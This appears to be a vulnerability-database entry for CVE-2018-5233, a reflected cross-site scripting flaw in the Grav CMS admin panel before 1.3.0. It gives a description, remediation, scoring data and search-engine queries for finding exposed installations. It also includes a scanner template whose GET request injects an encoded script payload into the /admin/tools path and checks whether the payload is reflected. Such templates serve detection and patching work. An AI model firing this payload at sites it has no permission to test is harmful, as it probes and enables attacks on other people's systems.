CVE-2018-5233: Grav CMS <1.3.0 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Grav CMS | POC: 已公开

漏洞描述

Grav CMS before 1.3.0 is vulnerable to cross-site scripting via system/src/Grav/Common/Twig/Twig.php and allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools.

PoC代码[已公开]

id: CVE-2018-5233

info:
  name: Grav CMS <1.3.0 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: |
    Grav CMS before 1.3.0 is vulnerable to cross-site scripting via system/src/Grav/Common/Twig/Twig.php and allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to admin/tools.
  remediation: |
    Upgrade Grav CMS to version 1.3.0 or later, which includes proper input sanitization to mitigate the XSS vulnerability.
  reference:
    - https://sysdream.com/news/lab/2018-03-15-cve-2018-5233-grav-cms-admin-plugin-reflected-cross-site-scripting-xss-vulnerability/
    - http://www.openwall.com/lists/oss-security/2018/03/15/1
    - https://nvd.nist.gov/vuln/detail/CVE-2018-5233
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-5233
    cwe-id: CWE-79
    epss-score: 0.18828
    epss-percentile: 0.95074
    cpe: cpe:2.3:a:getgrav:grav_cms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: getgrav
    product: grav_cms
    shodan-query:
      - html:"Grav CMS"
      - http.html:"grav cms"
    fofa-query: body="grav cms"
  tags: cve,cve2018,xss,grav,getgrav

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: body
        words:
          - '/themes/grav'
          - 'Grav Admin Login'
          - 'data-grav-'
        condition: or

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022006c7f217191649567dd85d44c61570669e000f70918c14badb7f6b8c35a88ac9022100e2616921ca142fc099cdebbf4e9d5f8d5b2bae904dfbc609724d2f312696dfa5:922c64590222798bb761d5b6d8e72950

相关漏洞推荐